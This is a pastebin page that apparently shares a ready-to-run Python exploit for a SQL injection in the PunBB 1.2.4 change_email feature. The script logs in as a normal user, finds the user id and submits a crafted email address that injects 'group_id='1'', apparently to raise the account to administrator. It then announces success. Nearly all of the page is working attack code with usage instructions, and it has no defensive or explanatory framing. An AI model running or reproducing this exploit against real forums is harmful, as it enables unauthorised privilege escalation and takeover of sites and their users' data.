This site is developed to XHTML and CSS2 W3C standards. If you see this paragraph, your browser does not support those standards and you need to upgrade. Visit WaSP for a variety of options.

php pastebin - collaborative irc debugging view php source

Paste #709

Posted by: rega
Posted on: 2026-07-02 16:56:07
Age: 5 hrs ago
Views: 10
#!/usr/bin/env python3

import requests
import sys
import re
from urllib.parse import urljoin

class Colors:
    GREEN = '\033[92m'
    BLUE = '\033[94m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    CYAN = '\033[96m'
    RESET = '\033[0m'

def banner():
    print(Colors.BOLD + Colors.CYAN + """
╔══════════════════════════════════════════════════════════════╗
║           PunBB 1.2.4 - change_email SQL Injection           ║
║                                                              ║
║                    by www.downgrade-net.ru                   ║
╚══════════════════════════════════════════════════════════════╝
    """ + Colors.RESET)

def success(msg):
    print(Colors.GREEN + "[+] " + msg + Colors.RESET)

def info(msg):
    print(Colors.BLUE + "[*] " + msg + Colors.RESET)

def warning(msg):
    print(Colors.YELLOW + "[!] " + msg + Colors.RESET)

def error(msg):
    print(Colors.RED + "[-] " + msg + Colors.RESET)

def main():
    banner()

    if len(sys.argv) < 6:
        print(f"Usage: python3 {sys.argv[0]} <url> <username> <password> <email> <email domain>")
        print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com")
        sys.exit(1)

    url = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]
    email = sys.argv[4]
    domain = sys.argv[5]

    s = requests.Session()

    info("Logging in as normal user...")
    
    login_data = {
        'req_username': username,
        'req_password': password,
        'form_sent': '1'
    }

    r = s.post(urljoin(url, "/login.php?action=in"), data=login_data)

    if r.status_code != 200 or "punbb_cookie" not in str(r.cookies):
        error("Login failed!")
        sys.exit(1)

    success("Successfully logged in!")

    info("Extracting user_id...")
    r = s.get(urljoin(url, "/index.php"))
    
    match = re.search(r'profile\.php\?id=(\d+)', r.text)
    if match:
        user_id = match.group(1)
        success(f"User-ID found: {user_id}")
    else:
        error("Could not find user_id!")
        sys.exit(1)

    info("Creating payload...")
    payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\','
    append = "group_id='1"
    padding = " " * (50 - len(append) - len(payload))
    final_email = payload + padding + append + f'"@{domain}'

    info(f"Payload: {final_email[:70]}...")

    success("Sending SQL Injection payload...")
    change_data = {
        'req_new_email': final_email,
        'form_sent': '1'
    }

    r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data)

    print(Colors.BOLD + Colors.GREEN + "\n" + "="*65)
    print("                  EXPLOIT FINISHED SUCCESSFULLY!")
    print("="*65 + Colors.RESET)
    print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        error("Interrupted by user")
    except Exception as e:
        error(f"Error: {e}")

Download raw | Create new paste

© BitByByte, 2026.
Downgrade Counter